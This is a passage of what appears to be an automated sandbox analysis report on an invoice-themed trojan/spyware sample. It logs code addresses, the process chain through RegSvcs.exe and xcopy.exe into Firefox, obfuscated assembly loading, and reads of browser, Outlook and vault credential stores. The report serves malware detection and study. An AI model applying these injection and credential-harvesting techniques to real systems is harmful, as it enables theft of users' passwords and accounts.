                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FF2FC86_2_02FF2FC8
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03000E596_2_03000E59
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03012E906_2_03012E90
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BCE936_2_030BCE93
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BEEDB6_2_030BEEDB
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0300AD006_2_0300AD00
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FF0CF26_2_02FF0CF2
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0309CD1F6_2_0309CD1F
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03018DBF6_2_03018DBF
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03000C006_2_03000C00
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FFADE06_2_02FFADE0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030A0CB56_2_030A0CB5
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030B132D6_2_030B132D
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0304739A6_2_0304739A
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030052A06_2_030052A0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FED34C6_2_02FED34C
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0301B2C06_2_0301B2C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030A12ED6_2_030A12ED
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030CB16B6_2_030CB16B
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0303516C6_2_0303516C
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0300B1B06_2_0300B1B0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FEF1726_2_02FEF172
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030070C06_2_030070C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030AF0CC6_2_030AF0CC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030B70E96_2_030B70E9
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BF0E06_2_030BF0E0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BF7B06_2_030BF7B0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030456306_2_03045630
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030B16CC6_2_030B16CC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030B75716_2_030B7571
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FF14606_2_02FF1460
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0309D5B06_2_0309D5B0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030C95C36_2_030C95C3
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BF43F6_2_030BF43F
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BFB766_2_030BFB76
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0301FB806_2_0301FB80
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03075BF06_2_03075BF0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0303DBF96_2_0303DBF9
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BFA496_2_030BFA49
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030B7A466_2_030B7A46
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03073A6C6_2_03073A6C
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03045AA06_2_03045AA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0309DAAC6_2_0309DAAC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030A1AA36_2_030A1AA3
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030ADAC66_2_030ADAC6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030959106_2_03095910
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030099506_2_03009950
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0301B9506_2_0301B950
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0306D8006_2_0306D800
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030038E06_2_030038E0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BFF096_2_030BFF09
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03001F926_2_03001F92
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BFFB16_2_030BFFB1
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FC3FD56_2_02FC3FD5
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FC3FD26_2_02FC3FD2
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03009EB06_2_03009EB0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03003D406_2_03003D40
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030B1D5A6_2_030B1D5A
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030B7D736_2_030B7D73
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0301FDC06_2_0301FDC0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03079C326_2_03079C32
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BFCF26_2_030BFCF2
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02811BE06_2_02811BE0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0280CB306_2_0280CB30
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0280ADC66_2_0280ADC6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0280ADD06_2_0280ADD0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0280CD506_2_0280CD50
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_028152306_2_02815230
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0282B7E06_2_0282B7E0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0281346B6_2_0281346B
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_028134706_2_02813470
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02E0E2386_2_02E0E238
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02E0E3536_2_02E0E353
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02E0E6EC6_2_02E0E6EC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02E0D7B86_2_02E0D7B8
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02E0E4C26_2_02E0E4C2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01025130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00FDB970 appears 280 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0105EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0106F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01037E54 appears 102 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 03047E54 appears 111 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 0307F290 appears 105 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 0306EA12 appears 86 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 02FEB970 appears 280 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 03035130 appears 58 times
                Source: Due Payment Invoice PISS2024993.exe, 00000000.00000002.2200867109.0000000004B86000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Due Payment Invoice PISS2024993.exe
                Source: Due Payment Invoice PISS2024993.exe, 00000000.00000002.2197154165.000000000152E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Due Payment Invoice PISS2024993.exe
                Source: Due Payment Invoice PISS2024993.exe, 00000000.00000002.2204771229.0000000007970000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Due Payment Invoice PISS2024993.exe
                Source: Due Payment Invoice PISS2024993.exeBinary or memory string: OriginalFilenameIaWe.exe> vs Due Payment Invoice PISS2024993.exe
                Source: Due Payment Invoice PISS2024993.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Due Payment Invoice PISS2024993.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, vLnWLW2yVODsKcu4eY.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, vLnWLW2yVODsKcu4eY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, vLnWLW2yVODsKcu4eY.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, DElvwy9pvaF1D0fn6T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, vLnWLW2yVODsKcu4eY.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, vLnWLW2yVODsKcu4eY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, vLnWLW2yVODsKcu4eY.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, DElvwy9pvaF1D0fn6T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, vLnWLW2yVODsKcu4eY.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, vLnWLW2yVODsKcu4eY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, vLnWLW2yVODsKcu4eY.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, DElvwy9pvaF1D0fn6T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@10/9
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Due Payment Invoice PISS2024993.exe.logJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMutant created: NULL
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMutant created: \Sessions\1\BaseNamedObjects\GCWzYULjgNhXJByAfbtd
                Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Local\Temp\56Q8T4HJump to behavior
                Source: Due Payment Invoice PISS2024993.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Due Payment Invoice PISS2024993.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: xcopy.exe, 00000006.00000002.3911641445.0000000002A66000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2596131463.0000000002A3A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3911641445.0000000002A3A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2598601470.0000000002A43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Due Payment Invoice PISS2024993.exeReversingLabs: Detection: 34%
                Source: unknownProcess created: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe "C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe"
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Due Payment Invoice PISS2024993.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Due Payment Invoice PISS2024993.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Due Payment Invoice PISS2024993.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: xcopy.pdbUGP source: RegSvcs.exe, 00000003.00000002.2419859326.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, cJjnESPXORw.exe, 00000005.00000003.2491694752.0000000000B18000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: IaWe.pdb source: Due Payment Invoice PISS2024993.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cJjnESPXORw.exe, 00000005.00000002.3911462074.000000000009E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2419783426.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2422109688.0000000002E0C000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: IaWe.pdbSHA256J source: Due Payment Invoice PISS2024993.exe
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, xcopy.exe, 00000006.00000003.2419783426.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2422109688.0000000002E0C000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: xcopy.pdb source: RegSvcs.exe, 00000003.00000002.2419859326.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, cJjnESPXORw.exe, 00000005.00000003.2491694752.0000000000B18000.00000004.00000001.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: Due Payment Invoice PISS2024993.exe, formMain.cs.Net Code: InitializeComponent
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, vLnWLW2yVODsKcu4eY.cs.Net Code: N6OjbSajQP System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4310b90.1.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, vLnWLW2yVODsKcu4eY.cs.Net Code: N6OjbSajQP System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Due Payment Invoice PISS2024993.exe.5e20000.3.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, vLnWLW2yVODsKcu4eY.cs.Net Code: N6OjbSajQP System.Reflection.Assembly.Load(byte[])
                Source: Due Payment Invoice PISS2024993.exeStatic PE information: 0xC0E554B8 [Wed Jul 20 15:41:44 2072 UTC]
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_05839738 push eax; mov dword ptr [esp], ecx0_2_0583973C
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098D39D1 push 5DE58B90h; ret 0_2_098D3A43
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098DFCEB push ecx; retf 0_2_098DFCEC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00418261 push ds; retf 3_2_00418263
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00403200 push eax; ret 3_2_00403202
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004164C3 push edx; ret 3_2_004164C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040CD46 push es; ret 3_2_0040CD47
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00415D76 pushad ; iretd 3_2_00415D7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00401E34 push edi; ret 3_2_00401E35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042CF43 push edi; iretd 3_2_0042CF4C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00415F6B push ecx; retf 3_2_00416090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040CF8F push esp; retf 3_2_0040CFAF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE09AD push ecx; mov dword ptr [esp], ecx3_2_00FE09B6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FC225F pushad ; ret 6_2_02FC27F9
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FC27FA pushad ; ret 6_2_02FC27F9
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FC283D push eax; iretd 6_2_02FC2858
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FF09AD push ecx; mov dword ptr [esp], ecx6_2_02FF09B6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FC1200 push eax; iretd 6_2_02FC1369
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0282059E push esi; retf 6_2_0282059F
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02820997 push ebx; retf 6_2_028209B2
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_028212AE push FFFFFFA5h; retf 6_2_028212B0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_028132C0 push edx; ret 6_2_028132C1
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0281505E push ds; retf 6_2_02815060
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02821693 push edx; iretd 6_2_028216AF
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0281B6A7 push ss; ret 6_2_0281B6B4
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_028216B0 push edx; iretd 6_2_028216AF
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0281B6B6 push ss; ret 6_2_0281B6B4
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02821445 push ecx; ret 6_2_02821446
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02815AA0 push esi; retn 9B70h6_2_02815B2E
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02809B43 push es; ret 6_2_02809B44
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0281B894 push cs; retf 6_2_0281B895
                Source: Due Payment Invoice PISS2024993.exeStatic PE information: section name: .text entropy: 7.948212011277769
